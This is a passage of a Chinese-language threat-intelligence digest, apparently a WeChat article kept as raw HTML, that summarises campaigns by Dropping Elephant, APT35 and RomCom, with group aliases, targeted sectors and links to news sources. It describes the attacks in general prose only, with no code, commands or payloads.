mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="8 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8majiw20v4" style="font-size: 32px;" data-mpa-action-id="md8majjwecx" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Dropping Elephant利用MSBuild部署嵌入式Python后门，实现系统控制与持久留存</span></span></p></div></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8j9i4022ao"><span leaf="">家族团伙别名：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf="">Hangover group, Maha grass group, Sloppy Lemming, APT-C-09, MONSOON, Sarit, Viceroy Tiger, 白象, WhiteElephant, Patchwork, 丰收行动, Chinastrats, Dropping Elephant, Hangover，摩诃草</span></span></p></li><li style="font-size:14px;"><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">家族团伙主要影响行业：</span></span></p><p style="text-align: left;"><span style="text-align: justify;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">金融，电信运营商，政法</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="color: rgb(0, 82, 255);font-weight: bold;font-size: 14px;text-align: left;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;text-align: left;"><span leaf=""><a href="https://cybersecuritynews.com/dropping-elephant-hacker-group-attacks-defense-sector/" target="_blank">https://cybersecuritynews.com/dropping-elephant-hacker-group-attacks-defense-sector/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;"><span leaf="" mpa-font-style="mdig1jnt1o4d" style="font-size: 14px;" data-mpa-action-id="mdig1jo4rhy" data-pm-slice="0 0 []">Dropping Elephant发起了一项复杂的多阶段网络攻击，以网络钓鱼邮件为初始入口，攻击者发送含恶意压缩包的邮件，诱使用户下载打开。压缩包内包含伪装合法的 MSBuild 工程文件（充当初始投递器）和伪装成 PDF 的诱饵文件，用以混淆检测、降低受害者警惕。文件执行后，投递器在系统相关目录下载多个恶意组件，借助计划任务功能建立持久性，任务名称模仿正常系统进程逃避检测。攻击还采用加密技术重构字符串、动态 API 解析等手段规避查杀，在目标系统部署嵌入式 Python 运行时环境，通过伪装 DLL 文件执行序列化 Python 字节码，实现后门程序隐蔽启动。该后门包含多个功能模块，具备全面系统控制和信息采集能力，与多个指挥控制域名保持通信，可长期潜伏等待指令。此次攻击技术与策略水平较高，可能导致相关关键基础设施信息泄露、系统遭非法控制，干扰核心业务流程，带来严重安全风险。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9nwx18pm"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8mag1iszk" style="font-size: 32px;" data-mpa-action-id="md8mag1o11kh" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">APT35借微软Exchange漏洞发动ProxyShell链攻击，致敏感信息泄漏与长期渗透</span></span></p></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">Charming-Kitten group, CharmingCypress, G0058, Group 83, Mint Sandstorm, NewsBeef, Newscaster, PHOSPHORUS, Parastoo, iKittensCOBALT MIRAGE, Charming Kitten, G0059, Magic Hound, TunnelVisionTG-2889</span></span></p></li><li style="font-size:14px;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙主要影响行业：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf="">政法, 教育</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j9nw51iia" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://cybersecuritynews.com/apt35-hacker-groups-internal-documents/" target="_blank">https://cybersecuritynews.com/apt35-hacker-groups-internal-documents/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;margin-bottom: 16px;"><span leaf="" mpa-font-style="mdig8jem1ew" style="font-size: 14px;" data-mpa-action-id="mdig8jez46l" data-pm-slice="0 0 []">2025 年 10 月发生重大信息泄露事件，曝光了APT35的内部运作，泄露文件含绩效报告、技术指南和操作记录，揭示其针对相关机构及企业开展网络间谍活动的系统性方法，也体现出该组织类似传统军事的管理模式与严格工作流程。攻击先侦查目标邮件服务器，利用特定漏洞链结合相关服务提取雇员联系信息，作为定向钓鱼攻击基础；获取访问权限后，部署伪装成合法系统文件的恶意程序建立远程命令执行能力，通过编码嵌入 HTTP 请求头部、静态令牌认证构建隐蔽通信通道；后续用相关工具窃取敏感凭据实现横向移动与持久访问，还通过自动化脚本完成恶意程序验证、邮箱内容提取等操作，所有流程按内部标准执行并量化记录。该组织攻击构成严重威胁，可能导致敏感信息外泄、长期网络渗透，对关键领域形成持续性风险。</span></p><p style="text-align: center;" nodeleaf=""><img data-imgfileid="100027325" class="rich_pages wxw-img" data-ratio="0.9623971797884842" data-s="300,640" data-type="png" data-w="851" style="width:100%;" type="block" data-backw="570" data-backh="549" src="https://wechat2rss.xlab.app/img-proxy/?k=726a6aeb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWU3pG3Rv4ehDd5TnAOWwNICInWp6mBDf5ictEPTNNnJ07MTkXoaHeiav9Tqd2Q3VJIHq3ibHKTOnVK6g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9nwx18pm"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8mag1iszk" style="font-size: 32px;" data-mpa-action-id="md8mag1o11kh" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">05</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">RomCom用SocGholish虚假更新投恶意软件，启动远程访问工具</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;font-weight:bold;"><p><span style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-weight: normal;letter-spacing: 0.034em;"><span leaf="">Storm-0978;Tropical Scorpius;UNC2596;Void Rabisu;UAC-0180;UAT-5647,  Void Rabisu, UAC-0180, UNC2596, UAT-5647, Storm-0978</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8j9nw51iia" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://thehackernews.com/2025/11/romcom-uses-socgholish-fake-update.html" target="_blank">https://thehackernews.com/2025/11/romcom-uses-socgholish-fake-update.html</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="mdig8jem1ew" style="font-size: 14px;" data-mpa-action-id="mdig8jez46l" data-pm-slice="0 0 []">RomCom组织自 2022 年起活跃于网络犯罪与间谍活动，针对特定关联实体开展攻击。此次攻击中，该组织首次利用假更新技术传递恶意载荷，攻击手法高效且呈多阶段特点。攻击者先在被攻陷的合法网站注入恶意 JavaScript 代码，模拟浏览器更新提示欺骗用户点击，进而下载安装关联加载器。加载器激活后与控制服务器建立连接，使攻击者可远程执行指令，完成侦察并确认目标匹配后展开攻击，后续还部署了自定义后门以支持进一步渗透操控。此次攻击通过社会工程学与插件漏洞结合，形成完整入侵链条，虽被及时拦截未造成进一步感染，但该组织的高效渗透与多载荷交付能力，预示未来可能给相关实体带来远程控制、数据泄露等严重风险。</span></p><p style="text-align: center;" nodeleaf=""><img data-imgfileid="100027326" class="rich_pages wxw-img" data-ratio="0.5227848101265823" data-s="300,640" data-type="png" data-w="790" style="width:100%;" type="block" data-backw="562" data-backh="294" src="https://wechat2rss.xlab.app/img-proxy/?k=4d102697&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWU3pG3Rv4ehDd5TnAOWwNICUyx2rG7vSoW7IK6BMPns2JexXiaY17GNaUF44YtPcu0sWFCCKQSiattQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px #222CFF;" data-mid=""><span leaf="">02</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8in6w7nn3" style="font-size: 20px;" data-mpa-action-id="md8in6x11o66" data-pm-slice="0 0 []">热点攻击手段</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div 